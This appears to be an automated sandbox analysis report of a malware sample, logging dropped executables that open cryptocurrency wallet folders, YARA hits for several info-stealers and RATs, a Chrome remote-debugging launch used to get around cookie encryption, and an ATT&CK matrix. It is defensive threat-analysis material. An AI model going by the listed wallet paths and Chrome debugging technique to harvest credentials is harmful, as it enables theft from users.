Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL

Source: Yara match

File source: Process Memory Space: 1VB7gm8.exe PID: 2744, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: uniq.exe PID: 8036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: L65uNi1.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 10.2.L65uNi1.exe.4109550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.L65uNi1.exe.4109550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.L65uNi1.exe.bb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.2488525794.0000000000BB2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2528551112.0000000004109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\af53YGc[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\L65uNi1[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\uniq[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 7496, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000008.00000003.2530230419.0000000000BE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2459365093.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2516223536.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1VB7gm8.exe PID: 2744, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 26.2.MvowLGc.exe.3083298.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.MvowLGc.exe.3078e08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.RegAsm.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.MvowLGc.exe.3083298.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.MvowLGc.exe.3078e08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.2673955387.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3393623748.0000000000382000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3430741230.0000000002643000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MvowLGc.exe PID: 340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	12 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Extra Window Memory Injection	11 Deobfuscate/Decode Files or Information	1 Credentials in Registry	246 System Information Discovery	Remote Desktop Protocol	41 Data from Local System	13 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	11 Registry Run Keys / Startup Folder	412 Process Injection	41 Obfuscated Files or Information	Security Account Manager	961 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Scheduled Task/Job	23 Software Packing	NTDS	3 Process Discovery	Distributed Component Object Model	1 Email Collection	11 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Registry Run Keys / Startup Folder	1 Timestomp	LSA Secrets	461 Virtualization/Sandbox Evasion	SSH	3 Clipboard Data	1 Remote Access Software	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	4 Non-Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	115 Application Layer Protocol	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	461 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	412 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Mshta	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report random.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Xworm

Threatname: Vidar

Threatname: Telegram RAT

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Bitcoin Miner

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
random.exe